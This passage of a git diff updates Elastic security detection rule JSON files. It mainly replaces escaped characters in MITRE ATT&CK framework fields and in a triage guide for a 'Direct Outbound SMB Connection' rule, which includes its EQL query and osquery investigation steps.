rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_102.json b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_102.json index 280109c86f8..2562e741539 100644 --- a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_102.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_103.json b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_103.json index ee715fa984d..ec8b4e943c4 100644 --- a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_104.json b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_104.json index 9eac17dd853..d4fde015e1c 100644 --- a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_104.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_105.json b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_105.json index 4840e195d22..2f3749777ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_105.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_100.json b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_100.json index a4513f90b2a..56de53418ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_100.json +++ b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_100.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_101.json b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_101.json index 5adb1513954..24f21bc5179 100644 --- a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_101.json +++ b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_101.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_102.json b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_102.json index e924a05efb7..fe5e18cb870 100644 --- a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_102.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_103.json b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_103.json index a348ddc01d5..f48821a3478 100644 --- a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_104.json b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_104.json index a6a8139a385..98471a6e4f6 100644 --- a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Direct Outbound SMB Connection", - "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.pid != 4 and\n not (process.executable : \"D:\\\\EnterpriseCare\\\\tools\\\\jre.1\\\\bin\\\\java.exe\" and process.args : \"com.emeraldcube.prism.launcher.Invoker\") and\n not (process.executable : \"C:\\\\Docusnap 11\\\\Tools\\\\nmap\\\\nmap.exe\" and process.args : \"smb-os-discovery.nse\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent *\\\\Ranger\\\\SentinelRanger.exe\",\n \"?:\\\\Program Files\\\\Ivanti\\\\Security Controls\\\\ST.EngineHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Fortinet\\\\FSAE\\\\collectoragent.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Azure Advanced Threat Protection Sensor\\\\*\\\\Microsoft.Tri.Sensor.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikService-release-*\\\\AuvikService.exe\",\n \"?:\\\\Program Files\\\\uptime software\\\\uptime\\\\UptimeDataCollector.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikAgentService.exe\",\n \"?:\\\\Program Files\\\\Rumble\\\\rumble-agent-*.exe\")]\n [network where host.os.type == \"windows\" and destination.port == 445 and process.pid != 4 and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n", "related_integrations": [ { @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_105.json b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_105.json index 1541ab38b45..59cab2e49e4 100644 --- a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Direct Outbound SMB Connection", - "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.pid != 4 and\n not (process.executable : \"D:\\\\EnterpriseCare\\\\tools\\\\jre.1\\\\bin\\\\java.exe\" and process.args : \"com.emeraldcube.prism.launcher.Invoker\") and\n not (process.executable : \"C:\\\\Docusnap 11\\\\Tools\\\\nmap\\\\nmap.exe\" and process.args : \"smb-os-discovery.nse\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent *\\\\Ranger\\\\SentinelRanger.exe\",\n \"?:\\\\Program Files\\\\Ivanti\\\\Security Controls\\\\ST.EngineHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Fortinet\\\\FSAE\\\\collectoragent.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Azure Advanced Threat Protection Sensor\\\\*\\\\Microsoft.Tri.Sensor.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikService-release-*\\\\AuvikService.exe\",\n \"?:\\\\Program Files\\\\uptime software\\\\uptime\\\\UptimeDataCollector.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikAgentService.exe\",\n \"?:\\\\Program Files\\\\Rumble\\\\rumble-agent-*.exe\")]\n [network where host.os.type == \"windows\" and destination.port == 445 and process.pid != 4 and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n", "related_integrations": [ { @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_106.json b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_106.json index a42f63f4b5d..81d921e432e 100644 --- a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_106.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Direct Outbound SMB Connection", - "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the 